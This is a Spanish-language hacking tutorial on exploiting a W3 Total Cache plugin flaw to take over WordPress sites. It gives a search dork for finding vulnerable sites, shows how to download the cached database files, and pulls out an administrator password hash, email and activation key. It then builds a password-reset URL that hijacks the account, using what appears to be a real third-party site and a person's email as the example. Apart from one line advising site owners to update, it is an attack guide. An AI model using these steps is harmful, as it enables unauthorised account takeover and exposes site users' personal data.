Vulnerabilidad Crítica "W3 Total Cache" + Pwned Wordpress Via Token.

Hace unos dias puede apreciar que alguien llamado zx2c4 encontró un vulnerabilidad critica en CMS Wordpress y que esta compromete datos de usuarios "Administradores" alojados en la base de datos,

lo que encontramos al explotar la vulnerabilidad es que:

simplemente hay que abrir los archivos con un editor de texto plano para poder ver las bases de datos guardadas en cache.

ok lo que encontramos siempre en un archivo como este es lo siguiente:

´   a:6:{s:10:"last_error";s:0:"";s:10:"last_query";s:37:"SELECT * FROM wp_users WHERE ID = '1'";s:11:"last_result";a:1:{i:0;O:8:"stdClass":10:{s:2:"ID";s:1:"1";s:10:"user_login";s:5:"admin";s:9:"user_pass";s:34:"$P$9bcsqkJ8V9RJsupuBO7tRJhacx/njU/";s:13:"user_nicename";s:5:"admin";s:10:"user_email";s:16:"perrodin@test.net";s:8:"user_url";s:7:"http://";s:15:"user_registered";s:19:"2008-02-16 01:10:48";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:5:"admin";}}s:8:"col_info";N;s:8:"num_rows";i:1;s:10:"return_val";i:1;}

Como podemos ver acá nos muestra el user y pass del administrador en este caso:

User: admin
Pass: $P$9bcsqkJ8V9RJsupuBO7tRJhacx/njU/

Por lo famoso que es este plugin, lo transforma en una amenaza poderosa para los usuarios de WordPress, y un potencial atacante podría comprometer fácilmente la web en su totalidad. La recomendación para los webmasters es que actualice el plugin a la versión nueva o denegar el acceso al directorio agregando un htccess.


Bueno hay muchas personas que se les hace muy difícil o demasiado tedioso andar desencriptando este tipo de hash de wordpress ($P$9bcsqkJ8V9RJsupuBO7tRJhacx/njU/), ahora con esta vulnerabilidad les mostrare como bypassear este tipo de hash combinando una vieja forma de saltar el hash de wordpress teniendo acceso a 3 datos que la vulnerabilidad en el plugin "W3 Total Cache" nos muestra.

Comenzamos:

Buscamos una pagina vulnerable a "W3 Total Cache"
Dork:

inurl:/wp-content/w3tc/dbcache/

Encontramos 227.000 resultados y la mayoría son vulnerables.

Ok lo siguientes es revisar si la web es vulnerable procedemos a testear la web con la herramienta que nos facilito "zx2c4" Aqui se las dejo w3-total-fail:

Como podemos apreciar nos muestra que si es vulnerable pero nos muestra solo user y pass para resetear la password necesitamos 3 datos (user_login, user_email, user_activation_key) pero como los obtenemos copiamos el link anterior al que nos mostro los datos de usuarios en este caso este:

Ahora vamos a nuestro navegador y pegamos dicho link automaticamente se descargara un archivo que procedemos a abrirlo con un editor de texto plano y nos mostrara la siguiente informacion:

Podemos ver que nos muestra todos los datos que se encuentran en la tabla wp_user de la base de datos ahora procedemos a extraer dichos datos para el reseteo de la pass:

"user_login";s:5:"amber"
"user_email";s:24:"amber.perrodin@yahoo.com"
"user_activation_key";s:20:"bVOnLnOPy1YEJCkfTl3I"

Y armamos el siguiente link:

http://www.localhost.com/wp-login.php?action=rp&key="Token o Key"&login="Nombre_Usuario"

En este caso nos queda asi:

http://amberperrodin.com/wp-login.php?action=rp&key=bVOnLnOPy1YEJCkfTl3I&login=amber

Sin Las Comillas (" ")

y procedemos a introducirlo en nuestro navegador y automaticamente resetea la password y nos pide que ingresemos una nueva clave de acceso

Aqui les dejo el video demostrativo: